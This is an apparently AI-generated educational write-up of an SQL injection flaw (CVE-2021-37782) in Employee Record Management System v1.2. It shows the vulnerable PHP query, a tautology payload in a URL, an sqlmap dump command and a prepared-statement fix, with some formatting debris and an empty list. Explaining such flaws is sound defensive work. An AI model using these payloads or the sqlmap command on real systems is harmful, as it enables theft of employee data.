CVE-2021-37782 - How Employee Record Management System v1.2 Became Vulnerable to SQL Injection (with Exploit Example)

In today's digital world, data security is a top concern for every business. One small vulnerability could allow attackers to breach entire systems and steal sensitive information. Recently, a critical vulnerability was found in Employee Record Management System v1.2, tracked as CVE-2021-37782. This article breaks down what CVE-2021-37782 is, why it's dangerous, and shows you—step-by-step—how attackers could exploit this flaw in simple terms.

> Disclaimer: This content is for educational purposes only. Never exploit vulnerabilities without permission.

About Employee Record Management System v1.2

The Employee Record Management System (ERMS) is a web-based application used by many small businesses to organize staff information. The vulnerability we discuss today affects version 1.2.

What is SQL Injection?

SQL Injection allows an attacker to run malicious SQL queries directly on the application database. This can lead to:

CVE-2021-37782 Explained

CVE-2021-37782 is a vulnerability found in editempprofile.php, part of ERMS v1.2. It lets unauthorized users inject SQL code by tampering with the request parameters. This means bad actors could read or change employee records—and even take over the entire database.

How Does The Vulnerability Work?

editempprofile.php is supposed to update user information. But it doesn't properly check or sanitize input data, making it easy to trick.

Consider the following (simplified) PHP code inside editempprofile.php

<?php
// ... session and DB code above ...
$empid = $_GET['id']; // ID comes from the URL
$query = "SELECT * FROM employees WHERE id = '$empid'";
$result = mysqli_query($conn, $query);
// ... rest of the code ...
?>

Notice how $empid comes straight from user input and is placed directly in the SQL query.

The attacker visits

http://example.com/editempprofile.php?id=1

Changing 1 to 1' OR '1'='1' -- in the URL

http://example.com/editempprofile.php?id=1'%20OR%20'1'%3D'1'%20--%20

SELECT * FROM employees WHERE id = '1' OR '1'='1' -- '

- &#039;1&#039;=&#039;1&#039; is always true, so the database returns ALL employee records!
- The -- tells SQL to ignore the rest, avoiding errors.

### 3. Possible Results

The attacker may:

- See private info of *all* employees
- Exfiltrate passwords, emails, and other sensitive data

---

## Exploit Proof-of-Concept (PoC)

Automated tools like sqlmap can make exploitation trivial. Here’s a basic run:

bash
sqlmap -u "http://example.com/editempprofile.php?id=1" --risk=3 --level=5 --dump


This command attempts extraction of all data from the vulnerable table.

---

## How To Fix (Patch Guidance)

The best way to prevent SQL Injection is by using prepared statements (parameterized queries). Here’s a secure example using MySQLi:

php
$empid = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM employees WHERE id = ?");
$stmt->bind_param("i", $empid); // 'i' for integer
$stmt->execute();
$result = $stmt->get_result();
// ... rest of the code ...
?>
`

Never trust raw input in SQL queries!

---

## References

- CVE-2021-37782 - NVD
- Packet Storm Write-up
- OWASP SQL Injection
- sqlmap - Automated SQL Injection Tool

---

## Conclusion

CVE-2021-37782 is a classic case of why input sanitization matters. If you use Employee Record Management System v1.2, update or patch your software now. Remember, SQL injection is one of the oldest tricks in the book—and still one of the most dangerous.

Stay safe and keep your company's data secure!

---

Author:
*Cybersecurity Educator @ ChatGPT*

Timeline

Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:33:00 UTC